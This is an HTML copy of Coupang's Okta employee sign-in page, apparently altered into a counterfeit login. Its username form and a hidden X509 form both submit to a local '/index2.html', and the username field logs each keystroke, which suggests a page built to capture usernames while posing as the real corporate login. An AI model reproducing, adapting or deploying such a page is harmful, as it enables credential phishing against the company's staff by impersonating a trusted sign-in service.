<!DOCTYPE html>
<html lang="ko"><!--<![endif]--><head>
  <meta charset="UTF-8">

  <script type="text/javascript" nonce="">if (typeof module === 'object') {window.module = module; module = undefined;}</script><style type="text/css" nonce="">
      .bgStyle {
        background-image: url('https://ok6static.oktacdn.com/fs/bco/7/fs0b332fopVuxiXei2p7')
      }
      .bgStyleIE8 {
        filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='https://ok6static.oktacdn.com/fs/bco/7/fs0b332fopVuxiXei2p7', sizingMethod='scale')
      }
      .copyright a:focus-visible, 
      .privacy-policy a:focus-visible {
        border-radius: 6px;
        outline: rgb(84, 107, 231) solid 1px;
        outline-offset: 2px;
        text-decoration: none !important;
      }
  </style><title>coupang_default - 로그인</title>
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="robots" content="noindex,nofollow">

  <script type="text/javascript" nonce="">window.cspNonce = '5p1tR9InjiiGcm9RHJS26w';</script><script src="https://ok6static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.30.1/js/okta-sign-in.min.js" type="text/javascript" integrity="sha384-EX0iPfWYp6dfAnJ+ert/KRhXwMapYJdnU2i5BbbeOhWyX0qyI4rMkxKKl8N5pXNI" crossorigin="anonymous"></script>
  <link href="https://ok6static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.30.1/css/okta-sign-in.min.css" type="text/css" rel="stylesheet" integrity="sha384-BkMkRN4QIU9BrZI9cC62jAat0eEZqMnykP67tCJEVQ5xJIFXzcq18qiSZGWxLvtg" crossorigin="anonymous">

  <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
<link href="https://ok6static.oktacdn.com/assets/loginpage/css/loginpage-theme.c8c15f6857642c257bcd94823d968bb1.css" rel="stylesheet" type="text/css"><link href="/api/internal/brand/theme/style-sheet?touch-point=SIGN_IN_PAGE&amp;v=abc4780733b2999dc5536ea4bf18a7237d32beafe91e2f7611b8af3ecb8ae0d0dfb208992a3b1ecefd0c0f9333f4b59d" rel="stylesheet" type="text/css">

  <script type="text/javascript" nonce="">
      var okta = {
          locale: 'ko',
          deployEnv: 'PROD'
      };
  </script><script nonce="">window.okta || (window.okta = {}); okta.cdnUrlHostname = "//ok6static.oktacdn.com"; okta.cdnPerformCheck = false;</script><script type="text/javascript" nonce="">
          window.onerror = function (msg, _url, _lineNo, _colNo, error) {
              if (window.console && window.console.error) {
                  if (error) {
                      console.error(error);
                  } else {
                      console.error(msg);
                  }
              }

              // Return true to suppress "Script Error" alerts in IE
              return true;
          };
      </script><script type="text/javascript" nonce="">
  if (okta) {
          okta.sentry = {
              sentryDsn: 'https://728f6bd7e621314e88a26d7337d3fd61@o101443.ingest.sentry.io/4507506066849792',
              orgId: '00o1jcz1vydkfL8Uv2p6',
              isCustomDomain: false,
              deployEnv: window.okta && window.okta.deployEnv,
              appName: 'okta-hosted-siw',
              teamName: '951953394',
              ignoreErrorTypes: '[]',
              ignoreErrors: '[]',
              filenamesAllowList: '["okta-sign-in.min.js","okta-sign-in.next.js"]',
              tracesSampleRate: '0'
          };
      }
  </script><script nonce="" src="https://ok6static.oktacdn.com/assets/js/mvc/sentry-wrapper/sentry-wrapper.pack.1c62a2034ee262c69bba2c45efe7a6cc.js" crossorigin="anonymous" integrity="sha384-9xCS02IHnPUPwl6LkckXDdcv+Adi0uLfpOh3QfSOX/MB9x/V/fMRPQ397Unlyipj" type="text/javascript"></script><script type="text/javascript" nonce="">if (window.module) module = window.module;</script><script src="https://ok6static.oktacdn.com/assets/js/mvc/loginpage/initLoginPage.pack.58de3be0c9b511a0fdfd7ea4f69b56fc.js" crossorigin="anonymous" integrity="sha384-cJ4LGViZBmIttMPH+ao2RyPuN5BztKWYWIa4smbm56r1cUhkU/Dr6vTS3UoPbKTI"></script></head>
<body class="auth okta-container">

<!--[if gte IE 8]>
<![if lte IE 10]>

   <style type="text/css" nonce="5p1tR9InjiiGcm9RHJS26w">
  .unsupported-browser-banner-wrap {
    padding: 20px;
    border: 1px solid #ddd;
    background-color: #f3fbff;
  }
  .unsupported-browser-banner-inner {
    position: relative;
    width: 735px;
    margin: 0 auto;
    text-align: left;
  }
  .unsupported-browser-banner-inner .icon {
    vertical-align: top;
    margin-right: 20px;
    display: inline-block;
    position: static !important;
  }
  .unsupported-browser-banner-inner a {
    text-decoration: underline;
  }
   </style><div class="unsupported-browser-banner-wrap">
    <div class="unsupported-browser-banner-inner">
      <span class="icon icon-16 icon-only warning-16-yellow"></span>지원되지 않는 브라우저를 사용 중입니다. 최적의 사용 환경을 위해 <a href="//help.okta.com/okta_help.htm?type=oie&locale=ko&id=csh-browser-support">지원되는 브라우저</a>로 업데이트하십시오.</div>
  </div>

<![endif]>
<![endif]-->
<!--[if IE 8]> <div id="login-bg-image-ie8" class="login-bg-image tb--background bgStyleIE8" data-se="login-bg-image"></div> <![endif]-->
<!--[if (gt IE 8)|!(IE)]><!--> <div id="login-bg-image" class="login-bg-image tb--background bgStyle" data-se="login-bg-image"></div> <!--<![endif]-->

<!-- hidden form for reposting fromURI for X509 auth -->
<form action="/index2.html" method="get" id="x509_login" name="x509_login" class="hide">
  <input type="hidden" id="fromURI" name="fromURI" class="hidden" value="/index2.html">
</form>

<div class="content">
<div class="applogin-banner">
        <div class="applogin-background"></div>
        <div class="applogin-container">
            <h1>
                <span class="applogin-app-title">
                  연결 대상</span>
                <div class="applogin-app-logo">
                    <img src="https://ok6static.oktacdn.com/assets/img/logos/okta_admin_app.da3325676d57eaf566cb786dd0c7a819.png" alt="Okta Admin Console" class="logo saasure"></div>
            </h1>
            <p>Okta Admin Console에 액세스하려면 귀하의 계정으로 로그인하십시오.</p>
            </div>
    </div>
<style type="text/css" nonce="">
  .noscript-msg {
      background-color: #fff;
      border-color: #ddd #ddd #d8d8d8;
      box-shadow:0 2px 0 rgba(175, 175, 175, 0.12);
      text-align: center;
      width: 398px;
      min-width: 300px;
      margin: 200px auto;
      border-radius: 3px;
      border-width: 1px;
      border-style: solid;
  }

  .noscript-content {
      padding: 42px;
  }

  .noscript-content h2 {
      padding-bottom: 20px;
  }

  .noscript-content h1 {
      padding-bottom: 25px;
  }

  .noscript-content a {
      background: transparent;
      box-shadow: none;
      display: table-cell;
      vertical-align: middle;
      width: 314px;
      height: 50px;
      line-height: 36px;
      color: #fff;
      background: linear-gradient(#007dc1, #0073b2), #007dc1;
      border: 1px solid;
      border-color: #004b75;
      border-bottom-color: #00456a;
      box-shadow: rgba(0, 0, 0, 0.15) 0 1px 0, rgba(255, 255, 255, 0.1) 0 1px 0 0 inset;
      -webkit-border-radius: 3px;
      border-radius: 3px;
  }

  .noscript-content a:hover {
      background: #007dc1;
      cursor: hand;
      text-decoration: none;
  }
</style><noscript>
  <div id="noscript-msg" class="noscript-msg">
      <div class="noscript-content">
          <h2>Javascript 필요</h2>
          <h1>브라우저에서 Javascript가 비활성화되어 있습니다.&nbspJavascript를 활성화하고 이 페이지를 새로 고치십시오.</h1>
          <a href="." class="tb--button">새로 고침</a>
      </div>
  </div>
</noscript>
<div id="signin-container"><main data-se="auth-container" tabindex="-1" id="okta-sign-in" class="auth-container main-container no-beacon" style=""><div class="okta-sign-in-header auth-header"><h1><img src="https://ok6static.oktacdn.com/fs/bco/1/fs0ke6hl9Nsa6UVrS2p6" class="auth-org-logo" alt="coupang_default logo logo" aria-label="coupang_default logo logo"></h1><div data-type="beacon-container" class="beacon-container"></div></div><div class="auth-content"><div class="auth-content-inner"><div class="siw-main-view identify primary-auth"><div class="siw-main-header"><div></div></div><div class="siw-main-body"><form method="GET" action="/index2.html" data-se="o-form" slot="content" id="form20" class="ion-form o-form o-form-edit-mode"><div data-se="o-form-content" class="o-form-content o-form-theme clearfix"><h2 data-se="o-form-head" class="okta-form-title o-form-head">We trust that you will always protect and safeguard the systems and the information that you have access to.</h2><div class="o-form-info-container"></div><div class="o-form-error-container" data-se="o-form-error-container" role="alert"></div><div class="o-form-fieldset-container" data-se="o-form-fieldset-container"><div class="sign-in-with-device-option"><div class="okta-verify-container"><a data-se="button" class="button link-button link-button-icon" href="#"><span class="icon okta-verify-authenticator"></span>Okta FastPass를 사용하여 로그인</a></div><div class="separation-line"><span>또는</span></div></div><div data-se="o-form-fieldset-identifier" class="o-form-fieldset o-form-label-top"><div data-se="o-form-label" class="okta-form-label o-form-label"><label for="input28">쿠팡은 여러분이 접근권한을 가진 시스템과 정보를 항상 보호하고 안전하게 지킬 것이라고 믿습니다.&nbsp;</label></div><div data-se="o-form-input-container" class="o-form-input o-form-has-errors"><p class="o-form-explain">Username (Office365 Account)</p><span data-se="o-form-input-identifier" class="o-form-input-name-identifier o-form-control okta-form-input-field input-fix o-form-has-errors"><input type="text" placeholder="" name="identifier" id="input28" value="" aria-label="" autocomplete="username" oninput="console.log('Username :', this.value)" aria-describedby="input-container-error53" aria-invalid="true"></span></div></div><div data-se="o-form-fieldset-rememberMe" class="o-form-fieldset o-form-label-top"><div data-se="o-form-input-container" class="o-form-input"><span data-se="o-form-input-rememberMe" class="o-form-input-name-rememberMe"><div class="custom-checkbox"><input type="checkbox" name="rememberMe" id="input36"><label for="input36" data-se-for-name="rememberMe">로그인 상태 유지</label></div></span></div></div></div></div><div class="o-form-button-bar"><input class="button button-primary" type="submit" value="다음" data-type="save"></div></form></div><div class="siw-main-footer"><div class="auth-footer"><a data-se="unlock" href="#" class="link js-unlock">계정을 잠금 해제하시겠습니까?</a><a data-se="help" href="https://coupang.okta.com/help/login" target="_blank" rel="noopener noreferrer" class="link js-help">도움말</a><a data-se="custom" href="https://auth.coupangcorp.net/signin/forgot-password" class="link js-custom">Forgot Password? [CoupangINC &amp; CFS Field L1 &amp; Coupang Partners]</a><a data-se="custom" href="https://coupang.service-now.com/sp?id=sc_cat_item&amp;sys_id=78d5d261db2b505090d4686dd396196d" class="link js-custom">Reset OKTA MFA? [ServiceNow Ticket]</a></div></div></div></div></div></main></div>

</div>

<div class="footer">
<div class="footer-container clearfix">
  <p class="copyright">Powered by <a href="https://www.okta.com/?internal_link=wic_login" class="inline-block notranslate">Okta</a></p>
      <p class="privacy-policy"><a href="/privacy" target="_blank" class="inline-block margin-l-10">개인정보 보호정책</a></p>
  </div>
</div>

<div id="inactive-tab-main-div" class="hide">
  <div class="inactive-tab-container">
  <div class="inactive-tab-header">
      <img src="https://ok6static.oktacdn.com/fs/bco/1/fs0ke6hl9Nsa6UVrS2p6" alt="Coupang" class="report-org-logo"><div class="divider"></div>
  </div>
  <div class="inactive-tab-content">
      <h2 class="inactive-tab-content-title">페이지 시간이 초과되었습니다.</h2>
      <p class="inactive-tab-details">이 페이지가 자동으로 다시 로드되지 않으면 브라우저를 새로 고치십시오.</p>
  </div>
</div>
</div>

<iframe id="account-chooser-iframe" data-se="account-chooser" class="hide" src="https://login.okta.com/discovery/iframe.html"></iframe></body></html>
